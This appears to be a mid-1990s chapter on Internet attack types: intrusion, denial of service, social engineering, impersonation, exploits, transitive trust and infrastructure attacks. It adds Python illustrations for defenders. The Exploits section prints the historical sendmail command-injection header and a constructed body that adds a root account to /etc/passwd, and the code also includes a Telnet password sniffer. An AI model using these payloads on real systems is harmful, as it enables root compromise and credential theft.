[Chap95] identifies three generic risks when connecting a trusted network with one that cannot be trusted :-
In a presentation titled "A Taxonomy of Internet Attacks - What you can expect to see" [Ranu95c], Marcus Ranum described eight types of attack from the Internet :-
A discussion of the generic threats identified by Chapman and of the types of attack identified by Ranum is given below.
Intrusion

Intrusion occurs when an attacker gains access to a system and is able to use and modify it in the same way as a legitimate user. In some cases rigorous password protection can protect against this type of attack, for example by locking an account after three failed login attempts. However policies also need to address social engineering attacks, where an attacker uses ploys such as posing as a senior manager and demanding an immediate password change so that very important and urgent work can continue. Some attacks in this category exploit weaknesses in operating system security and do not require the attacker to knock at the door: the door opens itself for them.
Industrial espionage is on the rise: [NCSA96] reports that 122 countries are currently actively engaged in industrial and economic espionage for the benefit of their respective states. A study in 1992 sponsored by the American Society for Industrial Security (ASIS) found that theft of proprietary business information had increased 260 percent since 1985 [NIST95]. The data indicated that 30 percent of the reported losses in 1991 and 1992 had foreign involvement. The study also found that 58 percent of thefts were perpetrated by current or former employees. The three most damaging types of stolen information were pricing information, manufacturing process information, and product development and specification information. Other types of information stolen included customer lists, basic research, sales data, personnel data, compensation data, cost data, proposals, and strategic plans [NIST95].
Most experts are pessimistic about the extent and scale of the problem; for example the following extract is from a recent book by an acknowledged expert on Internet security [Chap95].

"... Espionage is much more difficult to detect than run-of-the-mill break-ins, however. Information theft need not leave any traces at all, and even intrusions are relatively rarely detected immediately. Somebody who breaks in, copies data, and leaves without disturbing anything is quite likely to get away with it at most sites.

In practical terms most organisations can't prevent spies from succeeding. The precautions that governments take to protect sensitive information on computers are complex, expensive and cumbersome, and are therefore used on only the most critical resources. These precautions include electromagnetic shielding, careful access controls, and absolutely no connections to unsecured networks."
Traditional warfare may even be giving way to "Information Warfare". The implications that a failure of the communications infrastructure would have for technology-dependent Western society have prompted both Britain and the USA to develop formal information warfare policies. Information warfare represents a global challenge facing all late-industrial and information-age nation states. It also represents the cheapest way for less developed nation states and religious or political movements to attack major nations and industrial corporations anonymously and grievously [NCSA96]. During a World-wide Threat Assessment briefing to the US Senate Select Committee on Intelligence, John Deutch, Director of the US Central Intelligence Agency, said :-
"While intelligence sources have only identified a handful of countries that have instituted formal information warfare programs, I am concerned that the threat to our information systems will grow in coming years as the enabling technologies to attack these systems proliferate and more countries and groups develop new strategies that incorporate such attacks."
Denial of Service

A denial of service attack seeks to deny the use of resources to legitimate users. It can be achieved in a multitude of ways: by corrupting routing tables so that messages are re-routed, by overloading resources with junk messages, by damaging stored data, by locking user accounts, and so on.

Example 1 - The attacker ICMP-bombs a router off the network.

Example 2 - The attacker floods a network link with garbage packets.

Example 3 - The attacker floods a mail hub with junk mail (or many users send many messages to one address).(1)

There is little a network administrator can do to prevent denial of service attacks, since an attacker can always attack upstream of the point of connection to the Internet and disrupt service there. This is one of the reasons people are wary of using the Internet for mission critical or time critical connectivity.
Malicious Code
Malicious code can be thought of as an indirect denial of service attack. Most users are now familiar with the threat posed by viruses, worms and Trojan horses. However new forms of malicious code are appearing all the time. A new type of virus, the macro virus, attacks documents rather than programs, using the macro facilities of desktop productivity tools such as word processors.

Currently the two high risk areas for infection with malicious code are downloading files and binary attachments to mail messages. However new technologies are being developed that extend World Wide Web browsers by downloading software and executing it on the client rather than the server. Such programs are known as applets and greatly increase the risk of infection from malicious code.
Social Engineering

Example 1 An inexperienced user is tricked into changing his password (to one chosen by the attacker).

Example 2 The attacker masquerades as an administrator and asks the user for his password for some plausible reason, or gives the user a "new" password and tells him to change to it.
The infamous computer criminal Kevin Mitnick, subject of the book "Cyberpunk" [Hafn91], used social engineering techniques extensively. He was, for example, able to obtain a Pacific Bell internal memorandum by posing as a Pacific Bell executive and asking the author's secretary to fax him a copy. Mitnick had broken into the telephone company's computerised exchange and was able to divert the call to a friend's fax machine, which had been reprogrammed to indicate that the message had reached its correct destination. The details of the memo appeared on the front page of the New York Times shortly afterwards, in July 1988, in an article by John Markoff, the same journalist who would later that year break the story of Robert Tappan Morris and the Internet Worm [Mark88]; see also [Eich89].

Mitnick was also able to convince Neill Clift, a British computer researcher and VMS security expert, that he was an employee of Digital Equipment Corporation. At Clift's request Mitnick supplied technical manuals that Clift believed could only have come from Digital, and in return Clift released detailed information about security weaknesses.

People generally like being helpful and co-operative, and attackers exploit this ruthlessly. Social engineering is very hard to protect against: it is essentially an attack on a "soft" target and requires "soft" countermeasures such as staff education, clear policies and mechanisms for reporting problems.
Impersonation

Any attack in which the attacker captures a valid user-id and password and reuses them to gain access to a system.

Example 1 A user uses the Telnet program to connect to a system from a remote site, and an attacker with a network sniffer such as tcpdump or nitsniff captures the login session. The attacker is later able to log in to the system with the captured user-id and password.

Example 2 The attacker writes a shell script to present a false login session to the user. The user enters his correct user-id and password, which the script records before reporting a failed login and starting a real login session. The user thinks he has mistyped his password and is none the wiser.
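Example 1 describes a sniffer capturing a Telnet login. The following Python, added here as an illustration and not part of the original text or of any tool it names, shows how little work the attacker's sniffer has to do: it strips Telnet option negotiation from a client/server byte exchange and pulls out whatever the user typed after the "login:" and "Password:" prompts. The session bytes are constructed for the example. The same logic, run by a defender over captured traffic, is how an intrusion detection system flags plaintext credentials crossing the network.

```python
"""Reconstructing a Telnet login from sniffed traffic.
Added illustration with constructed session bytes; not from the original text."""

IAC, SB, SE = 255, 250, 240
NEGOTIATE = {251, 252, 253, 254}       # WILL, WONT, DO, DONT: IAC <cmd> <option>

# Constructed client/server exchange: 'S' = server to client, 'C' = client to server.
# The server echoes the login name but not the password, as a real telnetd does.
SESSION = [
    ("S", b"\xff\xfd\x18\xff\xfb\x01\r\nSunOS UNIX (host)\r\n\r\nlogin: "),
    ("C", b"\xff\xfc\x18"),                       # client refuses TERMINAL-TYPE
    ("C", b"a"), ("C", b"l"), ("C", b"i"), ("C", b"c"), ("C", b"e"), ("C", b"\r\n"),
    ("S", b"alice\r\nPassword: "),
    ("C", b"s3crey\x7ft\r\n"),                    # typo, corrected with DEL
    ("S", b"\r\nLast login: Mon Jul  1 09:12:00 1996\r\n$ "),
]

def strip_telnet(data):
    """Remove Telnet protocol commands, leaving only the user-visible bytes."""
    out, i = bytearray(), 0
    while i < len(data):
        if data[i] != IAC:
            out.append(data[i])
            i += 1
            continue
        if i + 1 >= len(data):
            break                                 # dangling IAC at segment end
        cmd = data[i + 1]
        if cmd == IAC:                            # escaped 0xff data byte
            out.append(IAC)
            i += 2
        elif cmd in NEGOTIATE:
            i += 3
        elif cmd == SB:                           # sub-negotiation runs to IAC SE
            end = data.find(bytes([IAC, SE]), i + 2)
            i = len(data) if end < 0 else end + 2
        else:
            i += 2                                # other two-byte commands (NOP, GA, ...)
    return bytes(out)

def extract_credentials(segments):
    """Return (login, password) typed in reply to the prompts, or None if not seen."""
    field, buf, creds = None, bytearray(), {}
    for direction, data in segments:
        text = strip_telnet(data)
        if direction == "S":
            low = text.lower()
            if b"password:" in low:
                field, buf = "password", bytearray()
            elif b"login:" in low and b"last login" not in low:
                field, buf = "login", bytearray()
        elif field is not None:
            for b in text:
                if b in (13, 10):                 # CR or LF terminates the field
                    creds[field] = buf.decode("ascii", "replace")
                    field = None
                    break
                if b in (8, 127):                 # backspace / DEL
                    if buf:
                        buf.pop()
                else:
                    buf.append(b)
    if "login" in creds and "password" in creds:
        return creds["login"], creds["password"]
    return None

if __name__ == "__main__":
    print(extract_credentials(SESSION))          # ('alice', 's3cret')
```

Nothing in the protocol protects the password: the only bytes the sniffer has to discard are option negotiations, and the user's own corrections (the DEL above) are applied just as the server applies them.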
Impersonation attacks are primarily sniffer and spoofing attacks [Tard95], with attackers seeking to capture passwords. It is a mistake to dismiss attacks on passwords as being of little danger. The miscreant who attacked Eindhoven University of Technology in 1990, prompting Wietse Venema to develop the TCP Wrappers tool, used password guessing as his primary means of gaining accounts [Vene92]. This individual (Venema referred to him as "his pet") frequently deleted all files on target systems.

Venema's "pet" has earned himself an interesting footnote in computer security history. He was known as "Berferd"(2) to Cheswick and Bellovin, who described his activities in "An Evening with Berferd" [Ches92] and in their book subtitled "Repelling the Wily Hacker" [Ches94]. As if this level of interest wasn't enough, Tsutomu Shimomura knew him as "Adrian"; Shimomura tracked him as he attacked and damaged computers all over the Internet and wrote about the experience in "Takedown" [Shim95]. Much of the early work on firewalls refers extensively to this one hacker, who escaped arrest or punishment because he conducted his attacks from the Netherlands, which at the time had no law under which he could be prosecuted.(3) There are several excellent accounts of how system administrators have pursued hackers and of the tools they developed in doing so [Stoll89, Bell92, Bell94, Hafn91, Shim96].
Exploits

These are attacks that exploit a hole in a piece of software, and most of CERT's advisories fall into this category. For example the UNIX sendmail program runs with system (root) privileges. Sending a message with the "To" and "From" fields completed as shown has given root access to the sender: the "To" address does not exist, so the message is returned to the "From" address, which sendmail treated as a program to pipe the message into. The sed command deletes the headers up to the first blank line, so the body of the message, written by the attacker, is fed to a shell running as root :-

    To: mrinvisible@nonexistent.com
    From: "| /bin/sed '1,/^$/d' | sh"

Exploits succeed because badly written software is the norm, security is generally added as an afterthought, too many programs run with excessive privilege in violation of the principle of least privilege, and few programs use the operating system's underlying security features [Ranu96c].
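The mechanism of the sendmail example above, as an added illustration in Python (not sendmail's own code, and not from the original text): a toy local delivery dispatcher that, like the vulnerable sendmail, treats any address beginning with "|" as a program to run with the mailer's root identity, including the "From" address a bounce is returned to, set beside a hardened version that honours program delivery only from an administrator-owned aliases file and never as root. The user and alias tables, the uid values and the message itself are constructed for the example.

```python
"""Program delivery driven by a network-supplied header: the pattern behind the
sendmail example. Added illustration with constructed data; not sendmail's code."""

NOBODY_UID = 65534                                   # unprivileged account for pipes
LOCAL_USERS = {"alice": 1000, "bob": 1001}           # constructed passwd subset
ALIASES = {"bugs": "|/usr/local/bin/filebug"}         # constructed, admin-owned aliases file

# Constructed message modelled on the To/From pair shown in the text.
MESSAGE = (
    "To: mrinvisible@nonexistent.com\n"
    "From: \"| /bin/sed '1,/^$/d' | sh\"\n"
    "Subject: hi\n"
    "\n"
    "echo 'attacker::0:0::/:/bin/sh' >> /etc/passwd\n"
)

def split_message(raw):
    """Return (headers dict keyed by lower-case name, body). Headers end at the first blank line."""
    head, _, body = raw.partition("\n\n")
    headers = {}
    for line in head.split("\n"):
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return headers, body

def sed_strip_headers(raw):
    """What  sed '1,/^$/d'  does to the message: drop everything up to and including
    the first blank line, leaving only the body for the shell to execute."""
    return raw.partition("\n\n")[2]

def resolve_vulnerable(addr):
    """Historic behaviour: an address beginning with '|' names a program to pipe the
    message into, run as the mailer itself (root), wherever the address came from."""
    addr = addr.strip().strip('"')
    if addr.startswith("|"):
        return ("pipe", addr[1:].strip(), 0)
    local = addr.split("@")[0]
    if local in ALIASES:
        return resolve_vulnerable(ALIASES[local])
    if local in LOCAL_USERS:
        return ("mailbox", local, LOCAL_USERS[local])
    return ("unknown", addr, None)

def deliver_vulnerable(raw):
    """Unknown recipient: the error report goes back to the header From address,
    which is resolved exactly like a recipient. That is the exploit path."""
    headers, _ = split_message(raw)
    kind, target, uid = resolve_vulnerable(headers.get("to", ""))
    if kind == "unknown":
        kind, target, uid = resolve_vulnerable(headers.get("from", ""))
    return {"action": kind, "target": target, "uid": uid}

def resolve_hardened(addr, source):
    """source is 'alias' (administrator-controlled file) or 'header' (data off the wire).
    Program delivery is honoured only for alias entries, and never as root."""
    addr = addr.strip().strip('"')
    if addr.startswith("|"):
        if source != "alias":
            raise ValueError("program address in network-supplied %s" % source)
        return ("pipe", addr[1:].strip(), NOBODY_UID)
    local = addr.split("@")[0]
    if local in ALIASES:
        return resolve_hardened(ALIASES[local], "alias")
    if local in LOCAL_USERS:
        return ("mailbox", local, LOCAL_USERS[local])
    return ("unknown", addr, None)

def deliver_hardened(raw):
    headers, _ = split_message(raw)
    try:
        kind, target, uid = resolve_hardened(headers.get("to", ""), "header")
        if kind == "unknown":
            kind, target, uid = resolve_hardened(headers.get("from", ""), "header")
        return {"action": kind, "target": target, "uid": uid}
    except ValueError as err:
        return {"action": "rejected", "target": None, "uid": None, "reason": str(err)}

if __name__ == "__main__":
    print(deliver_vulnerable(MESSAGE))   # pipe, uid 0: attacker's body runs as root
    print(deliver_hardened(MESSAGE))     # rejected
```

The two fixes the hardened version makes are exactly the two causes listed above: it distinguishes trusted configuration from untrusted input when deciding whether an address may name a program, and it runs any program it does start without the mailer's privilege.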
Transitive Trust

Transitive trust attacks take advantage of the trust models used by remote services (such as the "r" commands discussed in chapter 2).

Example 1 Many networks use ".rhosts" files so that users can log in from "trusted" hosts without giving a password. An attacker who gains access to a host and scans for exported file systems using remote procedure calls (for example by querying the NFS mount daemon) is able to build a trust model of the network. The attacker then compromises a user account on one of the remote computers to gain a foothold on an entirely new network. This is one of the strategies the 1988 Internet Worm used to propagate itself [Eich89].
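Example 1 describes the attacker building a trust model of the network from ".rhosts" files. The following Python, an added illustration not taken from the original text, inverts a set of .rhosts files into a "who may log into whom" graph, computes every host reachable from a compromised foothold by following trust transitively, traces the path to any one of them, and flags the entries (wildcards and hosts outside the local network) that an administrator's audit should catch. The host names and file contents are invented for the example.

```python
"""Transitive trust through .rhosts files: how far does one compromised host reach?
Added illustration with constructed data; not from the original text."""
from collections import deque

# Constructed: for each host, the entries found in the .rhosts files on it.
# An entry "A user" in B's file lets user@A rlogin to B without a password,
# so the trust edge runs A -> B.  "+" in the host field trusts every host.
RHOSTS = {
    "gw":         ["fileserver alice"],
    "fileserver": ["ws1 alice", "ws2 bob", "+ root"],
    "ws1":        ["fileserver alice", "ws2 alice", "evil.example.org alice"],
    "ws2":        ["ws1 bob"],
    "payroll":    ["fileserver admin"],
}

def trust_edges(rhosts):
    """Invert the files into {source host: set of hosts that trust it}, plus the
    set of hosts that trust everyone."""
    edges, open_to_all = {}, set()
    for target, entries in rhosts.items():
        for entry in entries:
            host = entry.split()[0]
            if host == "+":
                open_to_all.add(target)
            else:
                edges.setdefault(host, set()).add(target)
    return edges, open_to_all

def reachable(rhosts, foothold, honour_wildcards=True):
    """Breadth-first walk of the trust graph from a compromised host.
    Returns {host: host it was reached from}; the foothold maps to None."""
    edges, open_to_all = trust_edges(rhosts)
    via, queue = {foothold: None}, deque([foothold])
    while queue:
        here = queue.popleft()
        nxt = set(edges.get(here, ()))
        if honour_wildcards:
            nxt |= open_to_all
        for target in sorted(nxt):
            if target not in via:
                via[target] = here
                queue.append(target)
    return via

def attack_path(via, target):
    """Trace the chain of hops from the foothold to a reached host."""
    path = []
    while target is not None:
        path.append(target)
        target = via[target]
    return path[::-1]

def audit(rhosts, local_hosts):
    """Entries an administrator's review should flag: wildcard trust and trust
    of hosts outside the local network (the way in from outside)."""
    findings = []
    for target, entries in rhosts.items():
        for entry in entries:
            host = entry.split()[0]
            if host == "+":
                findings.append((target, entry, "wildcard trust"))
            elif host not in local_hosts:
                findings.append((target, entry, "trusts foreign host"))
    return findings

if __name__ == "__main__":
    via = reachable(RHOSTS, "evil.example.org", honour_wildcards=False)
    print(sorted(via))                              # every internal host falls
    print(attack_path(via, "payroll"))             # evil.example.org -> ws1 -> fileserver -> payroll
    for finding in audit(RHOSTS, set(RHOSTS)):
        print(finding)
```

A single entry trusting an outside host on one workstation is enough to reach the payroll machine in three hops, and the "+" wildcard on the file server makes the graph irrelevant: any host at all may log in there, and from there to everything that trusts the file server.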
Data Driven Attacks

Data driven attacks take the form of viruses and Trojan horses: the attacker supplies data which the victim's own software interprets in a harmful way. For example an attacker can email the victim a PostScript file with hidden file operations in it. If the victim displays the file on his workstation with a PostScript interpreter (such as Ghostscript), the interpreter will execute the file operations. These may perform actions such as adding the attacker's host name to the victim's ".rhosts" file, allowing the attacker to gain access to the victim's computer.

The World Wide Web is currently particularly vulnerable to data driven attacks. The emergence of languages such as Java, which run code on the client computer, presents attackers with significant new potential for this type of attack.

A firewall can help to screen out some data driven attacks. Some firewall vendors are incorporating anti-virus software into their products, and some are able to control the transfer of executable files. In general, however, firewalls provide little protection against data driven attacks.
Infrastructure Attacks

Infrastructure attacks include DNS spoofing, ICMP bombing and source routing.

Example 1 ICMP Bombing. ICMP (Internet Control Message Protocol) is used to re-route traffic on the fly (redirect messages) and by routers to notify a host when a destination system or network is unreachable. An attacker can use widely available tools such as "icmpbomb" or "nuke" to send forged ICMP "destination unreachable" packets to a target system, effectively knocking it off the Internet.

Most firewalls and routers can screen ICMP traffic. However ICMP is also used for legitimate purposes such as ping, and screening ICMP messages in routers can cause network problems. A firewall that is the single point of connectivity can act on ICMP messages itself without passing them through to the internal network.

Example 2 Source Routing. The IP source route option lets the sender dictate the path a packet takes, and hence the path its replies follow, which an attacker can use to impersonate a trusted host. Firewalls can block and log all source routed packets, and tools like TCP Wrappers can detect source routed packets and trigger alarms. Many routers can block source routed packets.
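Both infrastructure examples come down to fields in the IP and ICMP headers, so a filtering router or firewall can recognise them. The Python below, an added illustration and not the original text's or any vendor's code, builds IPv4 packets for test purposes, walks the IP options list for the loose and strict source route options (types 0x83 and 0x89), reads the ICMP type, and applies an example border policy in the spirit of the text: drop source routed packets, drop ICMP redirects arriving from outside, log destination-unreachable messages so that ICMP bombing is visible, and pass the rest. The packets and the policy are constructed for the example.

```python
"""Recognising source-routed packets and ICMP control messages at a border filter.
Added illustration with constructed packets; not from the original text."""
import socket
import struct

LSRR, SSRR = 0x83, 0x89          # IP option types: loose / strict source route
ICMP = 1
ICMP_UNREACHABLE, ICMP_REDIRECT = 3, 5

def build_ipv4(src, dst, proto, options=b"", payload=b""):
    """Constructed test packets only: minimal IPv4 header (checksum left zero) plus options."""
    options += b"\x00" * (-len(options) % 4)      # options are padded to a 32-bit boundary
    ihl = 5 + len(options) // 4
    header = struct.pack("!BBHHHBBH4s4s", (4 << 4) | ihl, 0, ihl * 4 + len(payload),
                         0, 0, 64, proto, 0, socket.inet_aton(src), socket.inet_aton(dst))
    return header + options + payload

def ip_header_len(pkt):
    """Header length in bytes from the IHL field, rejecting truncated or non-IPv4 input."""
    ihl = pkt[0] & 0x0F
    if (pkt[0] >> 4) != 4 or ihl < 5 or len(pkt) < ihl * 4:
        raise ValueError("not a complete IPv4 header")
    return ihl * 4

def source_route(pkt):
    """Return 'LSRR' or 'SSRR' if the packet carries a source route option, else None.
    Walks the option list, honouring the single-byte EOL (0) and NOP (1) options."""
    opts = pkt[20:ip_header_len(pkt)]
    i = 0
    while i < len(opts):
        kind = opts[i]
        if kind == 0:                             # end of option list
            break
        if kind == 1:                             # no-operation padding
            i += 1
            continue
        if i + 1 >= len(opts):
            raise ValueError("truncated IP option")
        length = opts[i + 1]
        if length < 2 or i + length > len(opts):
            raise ValueError("bad IP option length")
        if kind == LSRR:
            return "LSRR"
        if kind == SSRR:
            return "SSRR"
        i += length
    return None

def icmp_type(pkt):
    """ICMP type byte, or None if the packet is not ICMP."""
    hlen = ip_header_len(pkt)
    if pkt[9] != ICMP or len(pkt) < hlen + 1:
        return None
    return pkt[hlen]

def border_filter(pkt):
    """Example policy for the router or firewall at the Internet connection."""
    route = source_route(pkt)
    if route:
        return "drop: source routed (%s)" % route
    t = icmp_type(pkt)
    if t == ICMP_REDIRECT:
        return "drop: icmp redirect from outside"
    if t == ICMP_UNREACHABLE:
        return "allow+log: icmp destination unreachable"
    return "allow"

# Constructed packets: plain TCP, TCP with LSRR, TCP with NOP then SSRR, two ICMP messages.
PLAIN = build_ipv4("192.0.2.1", "10.0.0.5", 6)
LSRR_PKT = build_ipv4("192.0.2.1", "10.0.0.5", 6,
                      options=bytes([LSRR, 11, 4]) + socket.inet_aton("10.0.0.1") + socket.inet_aton("10.0.0.2"))
SSRR_PKT = build_ipv4("192.0.2.1", "10.0.0.5", 6,
                      options=bytes([1, SSRR, 7, 4]) + socket.inet_aton("10.0.0.1"))
REDIRECT = build_ipv4("192.0.2.1", "10.0.0.5", ICMP, payload=bytes([ICMP_REDIRECT, 1, 0, 0]) + b"\x00" * 4)
UNREACH = build_ipv4("192.0.2.1", "10.0.0.5", ICMP, payload=bytes([ICMP_UNREACHABLE, 1, 0, 0]) + b"\x00" * 4)

if __name__ == "__main__":
    for name, pkt in [("plain", PLAIN), ("lsrr", LSRR_PKT), ("ssrr", SSRR_PKT),
                      ("redirect", REDIRECT), ("unreach", UNREACH)]:
        print(name, border_filter(pkt))
```

The option walk matters: a filter that only inspects the first option byte is defeated by a NOP placed in front of the source route, which is why the loop skips NOPs and checks every option's length before trusting it.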
These are attacks that nobody has thought of yet. Such attacks, if and when they are discovered, will be full of surprises. An illustrative (and possible) example is racing authentication: an attacker sniffs packets as a legitimate user logs in with a SecurID or similar authentication token. The attacker mirrors the user's keystrokes and guesses the last digit of the SecurID code, thereby winning the "race" with the user to log in. If the attack is successful (on average 1 in 10 attempts should be) the attacker is granted access, and the user probably just thinks they have made a typing error.
Attackers are likely to use a combination of the above methods when seeking to gain unauthorised access or to deny service.

Example 1 The attacker tells a new user on IRC (Internet Relay Chat) to obtain a utility program that will help them use the system better. This phase of the attack can be categorised as social engineering. The user downloads the program and runs it, causing all his messages to be deleted and exposing the password file to the attacker. This phase of the attack can be categorised as data driven.
There are several tools that will probe a computer for known vulnerabilities [Farm93, Farm94, Drew95, Tabi96]. Some of these tools are freely available, for example Farmer and Venema's SATAN. They can be used by system administrators to perform security audits, but they can equally be used by attackers to probe for weaknesses.
(1) As happened to the law firm that sent unsolicited mail advertising its services.

(2) Berferd was the account name he captured at Bell Labs. The account name itself was based on an episode of the Dick Van Dyke show in which Dick Van Dyke's brother called him "Berferd" because he looked like a "Berferd".

(3) This changed in 1992. The first Dutch hackers to be arrested, at the end of February 1992, were much less harmful though [Vene92].